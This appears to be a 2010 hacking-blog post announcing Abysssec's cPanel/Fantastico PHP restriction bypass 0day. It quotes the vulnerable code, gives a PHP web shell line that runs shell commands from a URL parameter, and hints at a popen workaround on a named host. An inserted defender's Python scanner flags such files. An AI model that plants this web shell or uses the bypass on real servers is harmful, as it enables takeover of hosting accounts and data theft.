[MOAUB]Oday on Exploit-DB(Cpanel
And this fantastic project is finally under way:
The Abysssec Security Team is about to unleash its Month Of Abysssec Undisclosed Bugs on us. Abysssec will release a collection of 0days, web application vulnerabilities, and detailed binary analysis (and pocs) for recently released advisories by vendors such as Microsoft, Mozilla, Sun, Apple, Adobe, HP, Novell, etc. The 0day collection includes PoCs and Exploits for Microsoft Excel, Internet Explorer, Microsoft codecs, Cpanel and others. The MOAUB will be hosted on the Exploit Database, and will be updated on a daily basis. Get your hard-hats on, your VM’s and debugging tools organized – it’s gonna be an intensive ride. Follow both the exploit-db and Abysssec twitter feed to keep updated!
And here are the September oday by Abysssec:
Title : Cpanel PHP Restriction Bypass Vulnerability
Version : <= 11.25
Discovery : http://www.abysssec.com
Vendor : http://www.cpanel.net
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks. It can help an attacker to bypass restrictions such as mod_security, Safemod and disable functions.
This oday exploits a vulnerability in the PHP page:
/usr/local/cpanel/3rdparty/fantastico/autoinstallhome.php
Line 259:
$Directory = $Home_Directory . '.fantasticodata/' . $Script . '/' ;
$Files = Get_Files ( $Directory ) ;
As you can see, the script executes all the files contained in the directory .fantasticodata/requested_script.
So it is enough to add files of our own to have them executed without restrictions, for example:
<?php system($_GET['cmd']) ?>
The files are executed:
Now your PHP code will execute without /safe_mode/Disable_function/ Mod_security due to cpanel php.ini must be run with execute permission.
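A defender's check for the condition described above, as an added example (not code from Abysssec, cPanel or Fantastico): it walks each account's .fantasticodata directory and flags files that call command-execution functions or read request parameters. The function list, the reason labels and the sample tree are assumptions constructed for illustration; the page does not describe what legitimate Fantastico data files contain, so hits are candidates for review.

```python
import re
import tempfile
from pathlib import Path

# Heuristic (assumption): PHP built-ins that run commands or evaluate code.
# The page names system() and popen(); PHP function names are case-insensitive.
RISKY_CALL = re.compile(
    rb"\b(system|popen|exec|shell_exec|passthru|proc_open|eval)\s*\(",
    re.IGNORECASE,
)
REQUEST_INPUT = re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\b")


def audit_fantasticodata(home_root):
    """Return sorted (path, reasons) findings for files under */.fantasticodata/."""
    findings = []
    for data_dir in Path(home_root).glob("*/.fantasticodata"):
        for path in data_dir.rglob("*"):
            if not path.is_file():
                continue
            body = path.read_bytes()
            reasons = []
            if RISKY_CALL.search(body):
                reasons.append("command-or-eval-call")
            if REQUEST_INPUT.search(body):
                reasons.append("reads-request-input")
            if reasons:
                findings.append((str(path), reasons))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample: one benign data file, one file like the page's example."""
    samples = {
        "alice/.fantasticodata/WordPress/blog.php": b"<?php $path = '/home/alice/public_html/blog'; ?>",
        "bob/.fantasticodata/WordPress/x.php": b"<?php system($_GET['cmd']) ?>",
    }
    for rel, body in samples.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for path, reasons in audit_fantasticodata(tmp):
            print(path, ",".join(reasons))
```

On a real server the argument would be the directory that holds the account home directories, and the script needs read access to them.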
On netsons this vulnerability is not exploitable :( but anyway, by using popen you can still get around in the server :D but shh, it's a secret :D
Anyway, here is the original PoC:
The other oday, also published by Abysssec, concerns CVE-2010-1297
Cause:
Attackers can exploit this issue to execute arbitrary code or cause denial-of-service conditions.
:D have fun ;)
This entry was posted on Wednesday, September 1st, 2010 at 1:05 pm and is filed under Hacking.